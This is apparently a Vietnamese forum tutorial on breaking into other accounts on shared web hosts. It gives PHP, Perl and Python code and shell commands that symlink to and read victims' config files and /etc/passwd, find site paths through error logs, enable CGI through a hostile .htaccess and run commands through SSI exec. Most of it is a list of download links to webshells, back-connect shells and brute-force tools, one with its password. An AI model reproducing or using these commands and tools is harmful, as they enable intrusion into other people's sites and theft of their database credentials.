[+] Sử dụng các hàm system call của php để thực thi các command
các hàm system call thường là
exec -->> http://php.net/manual/en/function.exec.php
passthru -->> http://www.php.net/manual/en/function.passthru.php
system -->> http://www.php.net/manual/en/function.system.php
shell_exec -->> http://www.php.net/manual/en/function.shell-exec.php
... etc ..
Vậy ta sẽ thực thi command gì khi các hàm này không bị disabled
Đọc trực tiếp file config của mục tiêu bằng
cat , more , less
Hoặc chuyển đến thư mục của mục tiêu bằng lệnh cd rồi đọc file config bằng cat , more , less hoặc editfile bằng php nếu chmod yếu ....
Xem danh sách các user
cat /etc/passwd
Xem đường dẫn của website qua error_log
DirectAdmin
tail -n 10000 /var/log/httpd/domains/parkdream1.com.error.log|grep parkdream1
Cpanel
tail -n 10000 /usr/local/apache/logs/error_log|grep parkdream1
Danh sách username và domain tương ứng ( đối với DirectAdmin )
cat /etc/virtual/domainowners
Tiếp đến
Tạo file symlink đến mục tiêu thường là file config
ln -s /home/user/public_html/forum/includes/config.php 1.txt
đọc file 1.txt
thường ta sẽ không có quyền đọc file symlink 1.txt này do bị chmod ....
Nhưng ta có thể mượn các tiến trình cao hơn để đọc như
perl , python , zip , Followsymlink ....
[+] Bằng hàm posix_getpwuid
http://pastebin.com/nE77fsKG
[+]
readfile("/etc/passwd");
[+]
echo file_get_contents("/etc/passwd");
[+]
include("/etc/passwd");
Thực thi trong Eval PHP code
[+] Xem qua perl script sau
http://pastebin.com/88sFfJtb
[+] Tạo symlink qua run command
Khi không thể run command bằng PHP shell ta run command bằng perl , python shell
ln -s /home/user/public_html/forum/includes/config.php 1.txt
[+] Tạo file symlink bằng hàm của PHP
<?php
$target = '/home/user_target/public_html/forum/includes/config.php';
$link = '/home/user/public_html/1.txt';
symlink($target, $link);
?>
[+] Tạo File symlink nhờ perl , python
#!/usr/bin/perl -w
symlink('/etc/passwd','/root/Desktop/sym.txt');
#!/usr/bin/python
print "Content-type: text/html\n\n"
import os
filename = "1.txt"
linkto = "/etc/passwd"
os.symlink(linkto, filename)
[+] Thông qua bug
http://pastebin.com/DghFwrEP
[+] Indirect Symlink
Cơ sở là tạo 1 file symlink ở 1 nơi có thể tạo được rồi nén lại
Upload lên nơi cần symlink rồi giải nén
ln -s / r00t -> Tạo File symlink với thư mục /
tar czvf r00t.tar.gz r00t -> Nén file r00t thành r00t.tar.gz
Giải nén
tar xzf r00t.tar.gz
Shell Cgi (cgi.x-zone) khi gỏ command nó sẽ mã hóa dòng lệnh ,có thể qua mặt vài server
Code: http://www.mediafire.com/?45fsa46y5bdobfa
telnet 1.4
Code:http://www.mediafire.com/file/25587ndv7y4hy29/1.4.pl
bypass mod sec (base64)
Telnet 1.3
Code:http://www.mediafire.com/?eayxc5k8utpqeig
Code:.htaccess
Options +FollowSymLinks +Indexes
DirectoryIndex default.html
## START ##
Options +ExecCGI
AddHandler cgi-script cgi pl tg love h4 tgb cbg
RewriteEngine on
RewriteRule (.*)\.war$ $1.cgi
## END ##
RemoveHandler .vkl
AddType application/octet-stream .vkl
~> 2 dòng cuối khi symljnk ghi vào file.vkl thì file này load trên trình duyệt sẽ tự download về
Admin Finder (tìm thư mục admin)
Code:http://www.mediafire.com/?skaysiedncckx4k
cmd.shtml > view source cmd.shtml
Code:<!--#exec cmd="dir /home/victim/public_html/" -->
cmd.shtml (1.txt là file đã được symljnk) > view source cmd.shtml
<!--#include virtual='1.txt'-->
Bypass ln
Code:<?php
chmod('ln',0777);
system('./ln -s /etc/passwd > 1.txt');
?>
hoặc
Code:./ln -s /home/victim/public_html/index.php 1.txt
File SymLink.php
Code:http://www.mediafire.com/?8lghqsh4qe5x7qe
Code: /home/victim/public_html/index.php
Find Path qua error-log : http://victim.com/fuck
Code: tail -100 /var/log/httpd/domains/siteA.error.log | grep fuck
tail -100 /usr/local/apache/logs/error_log | grep fuck
Shell offline.php?acc ~> get user admin ,nhiều chức năng ,ko bị lổi trên các server config kỉ
Code: http://www.mediafire.com/?r19m52itzq71x5z
Backuper.php (Leech code)
Code: http://www.mediafire.com/?kp1p40fnwc2171k
Shell Unkonw (Brute)
Code: http://www.mediafire.com/?hvxjzrm1tjgbwmp
Shell images (r57)
Code:http://www.mediafire.com/?lh0nslgadbsb5ab
Shell images (Webadmin)
Code:http://www.mediafire.com/?lc6cizbpw5ijoio
Shell Dumper.php (Zip + Restor data)
Code:http://www.mediafire.com/?9ecl9efdk4mw3hm
Shell images aaa.php.jpg - shell upload
Code:http://www.mediafire.com/i/?d61ubhb1qw11dst
Shell help.php (upload file + chmod)
Code:http://www.mediafire.com/?j3u0mx4fj6xfmag
Unzip.php (giải nén các file bị zip)
Code: http://www.mediafire.com/?1bhs7jmvly3e1b4
Con shell này tạo ra thêm 2 file để thực hiện zip
Nếu ko tạo đc 2 file này thì chúng ta sẽ tự tạo 2 file đó
Code:http://www.mediafire.com/?ims0mlwa9e3yzl1
telnet v1.3 (ko cần htaccess)
Code:http://www.mediafire.com/?t1uu3cr6h6aag5c
sym-pl.pl (symljnk cgi ko cần htaccess)
Code: http://www.mediafire.com/?o8fm7bmw90882hq
Shell Root ( thực thi các dòng lệnh sẽ show ra trình duyệt - chỉ sd 1 số sv)
Code: http://www.mediafire.com/?f86f88nfesduuyp
Locus Shell (back connect)
Code:http://www.mediafire.com/?0vk8v5m8kzcqgvf
perl shell mr.thien (BackConnect)
Code:http://www.mediafire.com/?qedquldy39ilgn9
Mysqldumper.php (BackConnect)
Code: http://www.mediafire.com/?ei0anxe4vnsg04f
5.2.9 (BYpass)
Code: http://www.mediafire.com/?086h5hq21165ubj
dot.pl (tim user+domain)
Code: http://www.mediafire.com/?gnh3sv8273gp41e
upload.phpl (upload len path)
Code: http://www.mediafire.com/?cwax1iinx4ogoap
shell.xml (prefix admincp)
Code: http://www.mediafire.com/?82ht3sd6hpyyq7m
vault.php (editor,webshell,bind)
Code:http://www.mediafire.com/?a8c889wg81fjk2q
saudi.php (symljnk root ,brute,...)
Code:http://www.mediafire.com/?0yyyio6fv8h1axr
sa2.0.php(resever,symljnk root,upload)
Code:http://www.mediafire.com/?9zbsj162ve49kku
madspotshell.php(symlink tung user)
Code:http://www.mediafire.com/?4csxq5egze6kwcd
r57-vip.php symljnk
Code:http://www.mediafire.com/?3ydv9h1p8xgpfa7
Đã có rồi đây shell symlink toàn sever
http://upwap.ru/2381329
Shell 404 đây
http://upwap.ru/2381330 pass Sesshomaru